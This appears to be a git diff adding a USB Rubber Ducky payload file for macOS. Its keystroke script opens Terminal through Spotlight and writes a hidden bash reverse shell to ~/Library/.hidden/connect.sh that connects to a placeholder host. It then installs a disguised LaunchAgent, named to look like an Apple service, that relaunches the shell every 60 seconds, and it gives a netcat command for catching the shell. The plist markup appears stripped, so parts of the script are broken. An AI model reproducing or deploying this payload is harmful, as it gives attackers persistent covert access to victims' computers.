diff --git a/Payload----OSX-User-Backdoor.rdoc b/Payload----OSX-User-Backdoor.rdoc new file mode 100644 index 0000000..8cbc91e --- /dev/null +++ b/Payload----OSX-User-Backdoor.rdoc @@ -0,0 +1,79 @@ +* Author - Patrick Mosca +* Insert ducky. This script will created a persistent backdoor as the current user. It works by injecting code into a terminal from Spotlight. This payload was encoded with v2.4 on firmware duck_v2.1.hex. Change to your IP address or domain name and port number. +* A good tutorial on the payload here: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ + + + REM Patrick Mosca + REM A simple script for creating a persistent backdoor on OSX. + REM Change mysite.com to your domain name or IP address + REM Change 1337 to your port number + REM Catch the shell with 'nc -l -p 1337' + REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ + DELAY 1000 + GUI SPACE + STRING terminal + DELAY 500 + ENTER + DELAY 500 + STRING mkdir ~/Library/.hidden + ENTER + DELAY 200 + STRING echo '#!/bin/bash + ENTER + STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 + ENTER + STRING wait' > ~/Library/.hidden/connect.sh + ENTER + DELAY 500 + STRING chmod +x ~/Library/.hidden/connect.sh + ENTER + DELAY 200 + STRING mkdir ~/Library/LaunchAgents + ENTER + DELAY 200 + STRING echo ' + ENTER + STRING + ENTER + STRING Label + ENTER + STRING com.apples.services + ENTER + STRING ProgramArguments + ENTER + STRING + ENTER + STRING /bin/sh + ENTER + STRING '$HOME'/Library/.hidden/connect.sh + ENTER + STRING + ENTER + STRING RunAtLoad + ENTER + STRING + ENTER + STRING StartInterval + ENTER + STRING 60 + ENTER + STRING AbandonProcessGroup + ENTER + STRING + ENTER + STRING + ENTER + STRING ' > ~/Library/LaunchAgents/com.apples.services.plist + ENTER + DELAY 200 + STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist + ENTER + DELAY 200 + STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist + ENTER + DELAY 200 + GUI q + +Catch the shell with netcat: + + nc -l -p 1337 \ No newline at end of file